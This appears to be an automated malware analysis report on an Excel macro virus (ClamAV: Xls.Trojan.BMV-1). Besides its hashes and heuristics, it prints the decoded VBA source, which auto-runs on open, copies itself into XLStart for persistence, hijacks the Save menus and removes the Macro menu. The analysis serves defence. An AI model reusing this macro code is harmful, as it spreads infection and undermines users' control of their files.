Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c126debf95dfab18…

MALICIOUS

Office (OLE)

48.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 7b0ed7901ed3ce6099e1a9627513fdc5 SHA-1: 5d44d36a2343b51f5949f35aaab6e8456c0719b1 SHA-256: c126debf95dfab18bf0a75406dcad447062ecc75b32d68e7f5a05808e973fc90
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical heuristic 'OLE_VBA_AUTO' indicates the presence of an Auto_Open macro, which is commonly used for malicious execution upon opening an Excel file. The VBA script saves a copy of the workbook to the XLStart directory as 'BMV.xls', suggesting an attempt to establish persistence. The ClamAV detection 'Xls.Trojan.BMV-1' further confirms its malicious nature.

Heuristics 3

  • ClamAV: Xls.Trojan.BMV-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.BMV-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23994 bytes
SHA-256: 9e481a9a902fd8f670f4a132d7d167c2cc2ab0ade936319ad4c8faf44647864d
Detection
ClamAV: Xls.Trojan.BMV-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BMV"


Const strToolbar = "Standard"
Const strButtonName = "Save"
Const iButtonID = 2

Dim NewVersionInstalled As Boolean
Dim SameVersionInstalled As Boolean

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo StartUp
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    CheckVersion
    If NewVersionInstalled Then
        GoTo X
    Else
        If SameVersionInstalled Then
            n = ActiveWorkbook.Name
            GoTo X
        ElseIf NewVersion = False And SameVersion = False Then
            RemoveTheOthers
            GoTo I
        End If
    End If
I:
    fname = ActiveWorkbook.Name
    Sheets("BMV").Copy
    ActiveWorkbook.SaveAs _
       Filename:=Application.Path + "\XlStart\BMV.xls", _
       FileFormat:=xlNormal, password:="", WriteResPassword:="", _
       ReadOnlyRecommended:=False, CreateBackup:=False
    Windows("BMV").Activate
    ActiveWindow.Visible = False
    Workbooks("BMV").Save
    GoTo Z
StartUp:
    If Windows.Count = 1 Then
        Add_BMV_Button
        Add_BMV_Menus
        BMV_Action
    Else
        ActiveWindow.Close
    End If
Z:
If Workbooks.Count <= 1 Then
    Workbooks.Add
End If
X:
    Application.DisplayAlerts = True
End Sub


Private Sub Add_BMV_Button()
    Application.ScreenUpdating = False
    Set btns = Toolbars(strToolbar).ToolbarButtons
    Set btn = ButtonsIndex(btns, "Save")
    If Not (btn Is Nothing) Then
        btn.Delete
        Set btns = Toolbars(strToolbar).ToolbarButtons
        Set btn = ButtonsIndex(btns, strButtonName)
    End If
    iLoc = ButtonsLoc(btns, "Open")
    If iLoc = 0 Then
        Set btn = btns.Add(iButtonID)
    Else
        Set btn = btns.Add(iButtonID, iLoc + 2)
    End If
    btn.Name = strButtonName
    btn.OnAction = "BMV_Save"
End Sub


Private Function ButtonsIndex(ByVal Buttons As Object, ByVal bname As String) As Object
    For Each btn In Buttons
        If btn.Name = bname Then
            Set ButtonsIndex = btn
            Exit For
        End If
    Next
End Function


Private Function ButtonsLoc(ByVal Buttons As Object, ByVal bname As String) As Integer
    n = Buttons.Count
    For I = 1 To n
        If Buttons(I).Name = bname Then
            ButtonsLoc = 1
            Exit For
        End If
    Next
End Function


Sub Add_BMV_Menus()
Attribute Add_BMV_Menus.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo Z
    MenuBars(xlWorksheet).Menus("File").MenuItems("Save &As...").Delete
    MenuBars(xlWorksheet).Menus("File").MenuItems _
       .Add Caption:="Save &As...", _
       OnAction:="BMV_FileSaveAs", _
       Before:="Save &Workspace...", _
       StatusBar:="Saves document with new name, file format or password..."

    MenuBars(xlWorksheet).Menus("File").MenuItems("&Save").Delete
    MenuBars(xlWorksheet).Menus("File").MenuItems _
      .Add Caption:="&Save...", OnAction:="BMV_Save", _
       ShortcutKey:="^{s}", _
      Before:="Save &As...", _
      StatusBar:="Saves document..."
      
    MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Z:
End Sub


Sub BMV_Save()
Attribute BMV_Save.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    Select Case LCase(TypeName(ActiveSheet))
        Case "worksheet"
            If ActiveWorkbook.Path = "" Then
                BMV_FileSaveAs
            Else
                BMV_FileSave
            End If
        Case Else
            Beep
            MsgBox "Save failed...", vbCritical
    End Select
    Application.ScreenUpdating = True
End Sub


Sub BMV_FileSaveAs()
Attribute BMV_FileSaveAs.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    If ActiveSheet.Name <> "" Then
        On Error GoTo Z
        fsave = Application _
                .Dialogs(xlDialogSaveAs).Show
        If fsave <> False Then
            BMV_FileSave
        End If
    End If
Z:
If Windows("BMV").Visible = True Then Wind
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.